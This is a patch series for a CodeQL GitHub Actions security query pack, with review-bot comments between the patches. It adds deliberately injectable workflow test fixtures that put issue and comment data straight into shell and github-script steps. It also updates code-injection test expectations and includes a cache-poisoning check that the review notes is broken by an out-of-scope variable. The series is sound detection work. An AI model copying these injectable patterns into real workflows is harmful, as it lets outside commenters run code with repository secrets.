@@ -0,0 +1,61 @@ +name: Approve or Deny Marketplace Action Request + +on: + issue_comment: + types: [created] + +jobs: + parse-issue: + runs-on: self-hosted + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + approve-or-deny-request: + runs-on: self-hosted + needs: parse-issue + if: needs.parse-issue.outputs.payload != 'NOT_FOUND' + steps: + - name: Lookup the latest release of ${{ fromJson(needs.parse-issue.outputs.payload).owner }}/${{ fromJson(needs.parse-issue.outputs.payload).repo }} + id: get_version + env: + OWNER: ${{ fromJson(needs.parse-issue.outputs.payload).owner }} + REPO: ${{ fromJson(needs.parse-issue.outputs.payload).repo }} + REQUEST_VERSION: ${{ fromJson(needs.parse-issue.outputs.payload).version }} + run: | + if [ $REQUEST_VERSION == 'latest' ]; then + echo "Finding latest release of $OWNER/$REPO..." 
+ export VERSION=`curl https://api.github.com/repos/$OWNER/$REPO/releases/latest | jq -r .name` + else + export VERSION=$REQUEST_VERSION + fi + echo "VERSION: $VERSION" + echo "version=$VERSION" >> $GITHUB_OUTPUT + - name: Check out scripts + uses: actions/checkout@v3 + - name: Setup Node + uses: actions/setup-node@v3 + with: + node-version: '14' + check-latest: true + - name: Install dependencies + run: | + cd .github/scripts + npm install + - name: Approve or deny request + uses: actions/github-script@main + env: + VERSION: ${{ steps.get_version.outputs.version }} + with: + debug: true + script: | + const options = { token: '${{ secrets.TOKEN }}', adminOpsOrg: '${{ vars.ADMIN_OPS_ORG }}', actionsApprovedOrg: '${{ vars.ACTIONS_APPROVED_ORG }}', actionsApproverTeam: '${{ vars.ACTIONS_APPROVERS_TEAM }}', baseUrl: '${{ github.api_url }}', version: process.env.VERSION }; + const payload = ${{ needs.parse-issue.outputs.payload }} + await require('./.github/scripts/approve-or-deny-request.js')({github, context, payload, options}); From 0473c3824f46c74b04dbf80ac762751a9c83f090 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 11:38:39 +0200 Subject: [PATCH 0273/1267] Treat branch-deploy action as a source of HEAD ref for untrusted checkouts --- .../actions/security/UntrustedCheckoutQuery.qll | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 10a45830324..421af3be8ab 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll 
@@ -92,9 +92,15 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt or // 3rd party actions returning the PR head sha/ref exists(UsesStep step | - step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and - // TODO: This should be read step of the head_sha or head_ref output vars - this.getArgument("ref").regexpMatch(".*head_ref.*") and + ( + step.getCallee() = ["eficode/resolve-pr-refs", "xt0rted/pull-request-comment-branch"] and + // TODO: This should be read step of the head_sha or head_ref output vars + this.getArgument("ref").matches("%.head_ref%") + or + step.getCallee() = ["github/branch-deploy"] and + // TODO: This should be read step of the ref output var + this.getArgument("ref").matches("%.ref%") + ) and DataFlow::hasLocalFlowExpr(step, this.getArgumentExpr("ref")) ) or From a0939bb0a3dfc8fbbccd7c055ac2715fabede49c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:29:45 +0200 Subject: [PATCH 0274/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e68a4c67cc4..acfc1c7e210 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.22 +version: 0.0.23 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 465be503e7c..efafbbb55ba 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.22 +version: 0.0.23 groups: - actions - queries From ca59423c8a47ba15afebfa5213a9566bdf962de3 Mon Sep 17 00:00:00 2001 
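Review bot: `this.getArgument("ref").matches("%.ref%")` is a substring test, so it holds for any expression containing `.ref` followed by anything (`.refs`, `.ref_name`) and does not hold for the index form `outputs['ref']`. In the rewritten first branch, the `_` in `%.head_ref%` is itself a single-character wildcard under `matches`. The `hasLocalFlowExpr` conjunct limits the imprecision, but until the TODO read step exists a word-bounded pattern would be tighter, e.g. `this.getArgument("ref").regexpMatch(".*\\boutputs\\.ref\\b.*")`. The enclosing characteristic predicate of `ActionsMutableRefCheckout` starts and ends outside this hunk.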
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:32:40 +0200 Subject: [PATCH 0275/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index acfc1c7e210..54748d6fd62 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.23 +version: 0.0.24 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index efafbbb55ba..1b8d7e64028 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.23 +version: 0.0.24 groups: - actions - queries From f96b9cc5356f5ffd29b7f94fb54fd59df2aafe93 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 15:35:13 +0200 Subject: [PATCH 0276/1267] Update tests --- ql/test/library-tests/test.expected | 1 + .../query-tests/Security/CWE-094/CodeInjection.expected | 7 +++++++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 8 ++++++++ 3 files changed, 16 insertions(+) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 61f7120e78e..20db431fc24 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -464,6 +464,7 @@ sources | jitterbit/get-changed-files | * | output.renamed | filename | manual | | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | | marocchino/on_artifact | * | output.* | artifact | manual | +| peter-murray/issue-body-parser-action | * | output.* | text | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 9e479f9eaf4..cc716c47e69 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -59,6 +59,9 @@ edges | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -222,6 +225,10 @@ nodes | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 738270e3ccd..87658e4149e 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -59,6 +59,9 @@ edges | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -222,6 +225,10 @@ nodes | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | semmle.label | steps.changed.outputs.locale_files | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | semmle.label | Uses Step: changed2 | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | semmle.label | steps.changed2.outputs.locale_files | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -333,6 +340,7 @@ subpaths | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | +| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | From 30d0b9d1333120d31fc4a378b5f8c38428fac760 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 22:07:49 +0200 Subject: [PATCH 0277/1267] Add context paths containing tainted fields --- .../codeql/actions/dataflow/FlowSources.qll | 30 ++++++++----------- 1 file changed, 13 insertions(+), 17 deletions(-) 
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 9e4c258e39a..08717c33787 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -76,22 +76,6 @@ private predicate textEvent(string context) { ) } -// bindingset[context] -// private predicate repoNameEvent(string context) { -// exists(string reg | -// reg = -// [ -// // repo name -// // Owner: All characters must be either a hyphen (-) or alphanumeric -// // Repo: All code points must be either a hyphen (-), an underscore (_), a period (.), or an ASCII alphanumeric code point -// "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", // repo name -// "github\\.event\\.workflow_run\\.head_repository\\.name", // repo name -// "github\\.event\\.workflow_run\\.head_repository\\.full_name", // nwo -// ] -// | -// Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) -// ) -// } bindingset[context] private predicate branchEvent(string context) { exists(string reg | 
@@ -194,7 +178,19 @@ private predicate jsonEvent(string context) { reg = [ // json - "github\\.event", + "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", + "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", + "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", + "github\\.event\\.merge_group\\.committer", "github\\.event\\.pull_request", + "github\\.event\\.pull_request\\.head", "github\\.event\\.pull_request\\.head\\.repo", + "github\\.event\\.pages", "github\\.event\\.review", "github\\.event\\.workflow", + "github\\.event\\.workflow_run", "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_commit", + "github\\.event\\.workflow_run\\.head_commit\\.author", + "github\\.event\\.workflow_run\\.head_commit\\.committer", + "github\\.event\\.workflow_run\\.head_repository", + "github\\.event\\.workflow_run\\.pull_requests", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) From 7a66b12437ec1870d915e2fd421131119fdbcacb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 22:33:50 +0200 Subject: [PATCH 0278/1267] add tests --- .../CWE-094/.github/workflows/test4.yml | 19 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 2 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 3 files changed, 25 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml new file mode 100644 index 00000000000..c4380bfa8af --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml 
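Review bot: The expanded pattern list in `jsonEvent` is still introduced only by `// json`, which does not say why whole objects such as `github.event.comment` or `github.event.pull_request.head.repo` count as sources. I would replace it with `// context objects that contain attacker-controlled fields; serialising one (e.g. with toJSON) carries those fields along`. `github\\.event\\.workflow_run\\.head_branch` looks like a scalar branch name rather than an object, so it probably belongs with the patterns in `branchEvent` (whose list is not visible here); worth confirming so the same expression is not classified twice. Listing one pattern per line would also make later additions easier to review. The predicate starts before and continues after this hunk.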
@@ -0,0 +1,19 @@ +name: Test +on: + issue_comment: + types: [created, edited] + +permissions: + contents: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Dump GitHub comment context + id: github_comment_step + run: echo '${{ toJSON(github.event.comment) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event.issue) }}' diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index cc716c47e69..34e173a055b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 87658e4149e..4b270404373 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
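Review bot: The fixture exercises only `toJSON(github.event.comment)` and `toJSON(github.event.issue)`, while the previous commit added more than twenty object paths to `jsonEvent`, so a typo in any other pattern (for example `github\\.event\\.workflow_run\\.pull_requests`) would not fail a test. One extra step per event family would pin the rest of the list. A step that passes the value through `env:` and reads it as a quoted shell variable would also record the case that is expected to stay unreported. A leading comment such as `# Intentionally injectable: query test fixture, not a workflow to copy` would keep the file from being read as an example.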
+++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -341,6 +343,8 @@ subpaths | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | ${{ steps.changed2.outputs.locale_files }} | | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | ${{ toJSON(github.event.comment) }} | +| .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | ${{ toJSON(github.event.issue) }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | 
From 6e8fc89034f9214461714c6401c277be95565483 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Wed, 15 May 2024 09:29:24 +0000 Subject: [PATCH 0279/1267] Add default branch name check --- ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 10 ++++++++-- .../dataflow/internal/ExternalFlowExtensions.qll | 6 +++++- .../actions/security/CachePoisoningQuery.qll | 15 ++++++++------- ql/lib/ext/workflow-models/workflow-models.yml | 6 ++++++ ql/test/library-tests/workflowenum.ql | 6 +++--- 5 files changed, 30 insertions(+), 13 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 5db10e7823e..f10a90ee6ee 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -3,10 +3,16 @@ private import codeql.actions.DataFlow private import actions predicate workflowDataModel( - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner ) { - Extensions::workflowDataModel(path, visibility, job, secrets_source, permissions, runner) + Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner) +} + +predicate repositoryDataModel( + string visibility, string default_branch_name +) { + Extensions::repositoryDataModel(visibility, default_branch_name) } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 529f7721e71..34f0297d799 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll 
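Review bot: `repositoryDataModel` is added without QLDoc, and the second column of `workflowDataModel` changes meaning from `visibility` to `trigger` without a note. Data-extension rows are positional, so existing rows keep whatever was written in that column. I would document both, e.g. `/** Holds if the analysed repository has the given visibility and default branch name, as supplied by a data extension. */`, and state on `workflowDataModel` which values `trigger` takes. Any caller that still compares that column with `"public"` would stop matching once rows carry a trigger name; none is visible in this hunk, so the rest of the pack needs checking.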
@@ -24,6 +24,10 @@ extensible predicate sinkModel( ); extensible predicate workflowDataModel( - string path, string visibility, string job, string secrets_source, string permissions, + string path, string trigger, string job, string secrets_source, string permissions, string runner ); + +extensible predicate repositoryDataModel( + string visibility, string default_branch_name +); diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index ab0f2d0809a..df2e1db3bdd 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -10,17 +10,18 @@ string defaultBranchTriggerEvent() { ] } -string defaultBranchNames() { result = ["main", "master", "default"] } - predicate runsOnDefaultBranch(Job j) { exists(Event e | j.getATriggerEvent() = e and + exists(string default_branch_name | + repositoryDataModel(_, default_branch_name) + ) and ( e.getName() = defaultBranchTriggerEvent() and not e.getName() = "pull_request_target" or e.getName() = "push" and - e.getAPropertyValue("branches") = defaultBranchNames() + e.getAPropertyValue("branches") = default_branch_name or e.getName() = "pull_request_target" and ( 
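Review bot: In `runsOnDefaultBranch`, `default_branch_name` is declared inside `exists(string default_branch_name | repositoryDataModel(_, default_branch_name))` but used after that quantifier has closed, where the name is no longer in scope. That affects `e.getAPropertyValue("branches") = default_branch_name` here and the `branches`/`branches-ignore` comparisons in the next hunk (`@@ -30,18 +31,18 @@`). Either the comparisons move inside the quantifier, or the lookup stays behind the removed helper, `string defaultBranchNames() { repositoryDataModel(_, result) }`, which leaves every call site as it was. The predicate continues past the end of this hunk.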
